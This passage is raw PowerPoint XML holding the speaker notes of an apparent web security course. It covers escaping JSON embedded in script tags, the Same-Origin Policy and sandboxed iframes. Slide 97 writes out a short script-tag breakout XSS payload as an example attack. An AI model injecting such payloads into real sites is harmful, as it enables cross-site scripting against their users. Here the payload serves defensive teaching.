              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> object contains any string with &lt;/script&gt; in it, that will escape out of your script tag and start appending everything after it as HTML code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An example attack would look like: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;script&gt;alert(‘XSS’){{&lt;/script&gt;&lt;script&gt;alert(‘XSS’)}}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12279718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Running an XSS sanitizer over your JSON object will most likely mutilate it. (graphic of busted up JSON)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>If you are going to include JSON output in your HTML code, it must be serialized.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For node environments,  consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/yahoo/serialize-javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For rails environments,  consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>json_escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0"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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://api.rubyonrails.org/classes/ERB/Util.html#method-c-json_escape</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Example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>window.__INITIAL_STATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = &lt;%= serialize(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>initialState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>) %&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="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52A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10149404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 primary feature of this package is to serialize code to a string of literal JavaScript which can be embedded in an HTML document by adding it as the contents of the &lt;script&gt; element. In order to make this safe, HTML characters and JavaScript line terminators are escaped automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>serialize({ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>haxorXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: '&lt;/script&gt;' });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The above will produce the following string, HTML-escaped output which is safe to put into an HTML document as it will not cause the inline script element to terminate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'{"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>haxorXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>":"\\u003C\\u002Fscript\\u003E"}'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{552A36D7-AFAB-C146-81C6-DC116B495F37}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12184836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Same-Origin Policy isolates browsing contexts with different origins from each other. This isolation prevents malicious browsing contexts from attacking other browsing contexts.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>However, the security properties of the Same-Origin Policy can be used to increase the security of an application. Modern applications combine components with different sensitivity and trust levels. In this lesson, we investigate how to leverage the Same-Origin Policy to compartmentalize your applicatio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> using iFrame sandboxing.</a:t>
            </a:r>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24230881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An important design principle is the principle of least privilege. A component should not have more privileges than needed to perform its tasks. Unfortunately, this principle is often overlooked in web applications. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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Imagine an application offering its users access to news stories and comments. It contains different components, such as the news stories, its comments, or the user's account details. Often, these components are integrated into one application. The application is then deployed on the primary origin, such as "&lt;https, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, 443&gt;". </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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As a result, the successful injection of malicious code in a comment compromises the entire application. Regardless of the sensitivity of the components, the attacker can access them all. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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To proper approach to avoid such problems is to compartmentalize the application. Sensitive components, such as managing account details, should be isolated in a separate origin.  Loading this component from the "&lt;https, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>accounts.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, 443&gt;" origin leverages the Same-Origin Policy. The Same-Origin Policy prevents interaction between the main application and the accounts component.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There are two practical ways to deploy the example we discussed here. The first way is to navigate between different pages from different origins. For example, to access account details, the user is sent to a page in the "&lt;https, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>accounts.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, 443&gt;" origin. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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 second way uses iframes to embed different components in the main application. A careful design suffices to avoid a negative impact on the user experience.</a:t>
            </a:r>
          </a:p>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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9161107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Up until now, we talked about using origin-based isolation to protect sensitive parts. But we can apply similar techniques to enforce isolation of untrusted components. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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In our example, the comments on a news story are an untrusted component. These comments contain user-provided data and are a potential attack vector for injection attacks. Remember, there is only one script context associated with a browsing context. So a successful injection attack compromises of the entire browsing context.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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Isolating the comments in a separate origin can already be useful to mitigate the danger. But even though the malicious code is now isolated, it can still cause a lot of harm. That is why the HTML5 specification introduced the sandbox attribute for iframes.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Adding the sandbox attribute to an iframe imposes a set of extra restrictions on its content. By default, the browser applies the following restrictions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The content is assigned a separate and unique origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Scripts are not executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Forms cannot be submitted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Navigation of external contexts is not allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Popups are not allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Plugin content, such as Flash or Java, is not executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Fullscreen capabilities are not available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Autoplay for multimedia content is not available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>As you can see, a sandboxed iframe is the perfect environment to load untrusted content. By default, scripts are not allowed to be executed, and the content is isolated in a unique origin. Even if an attacker managed to inject malicious code, it would now be restricted in its actions. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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To be fair, these restrictions are quite strict and have an impact on the usability. Fortunately, these restrictions are configurable through the value of the sandbox attribute. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:b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The following keywords can be used to finetune the desired set of restrictions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allow-same-origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allow-scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allow-forms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allow-top-navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allow-popups</a:t>
            </a:r>
          </a:p>
          <a:p>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 final remark about the use of sandboxed iframes in practice. Combining the "allow-sameorigin" and "allow-scripts" permission enables a bypass attack on the sandbox. The "allow-scripts" permission allows the execution of malicious code. The "allow-sameorigin" permission allows access to the application's browsing context. So use one or the other, but never both together.</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capability to isolate content in a unique origin is quite compelling. Thanks to this property, you no longer need to serve untrusted content from a different origin. Instead, you can load it from the same origin as the rest of the application. Applying the sandbox attribute suffices to ensure isolation in a unique origin. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>There is a second benefit of this security property as well. Multiple sandboxed iframes will all be isolated from each other as well. The origin associated with an iframe is unique, and will never match any other origin in the browser.</a:t>
            </a:r>
          </a:p>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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2011141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One of the drawbacks of isolating content in an iframe is the incurred overhead. To load a component in an iframe, the browser needs to fetch the page in a separate request. This may not be a problem for loading a single component. But isolating every comment in a separate sandbox becomes impractical rather quickly. </a:t>
            </a:r>
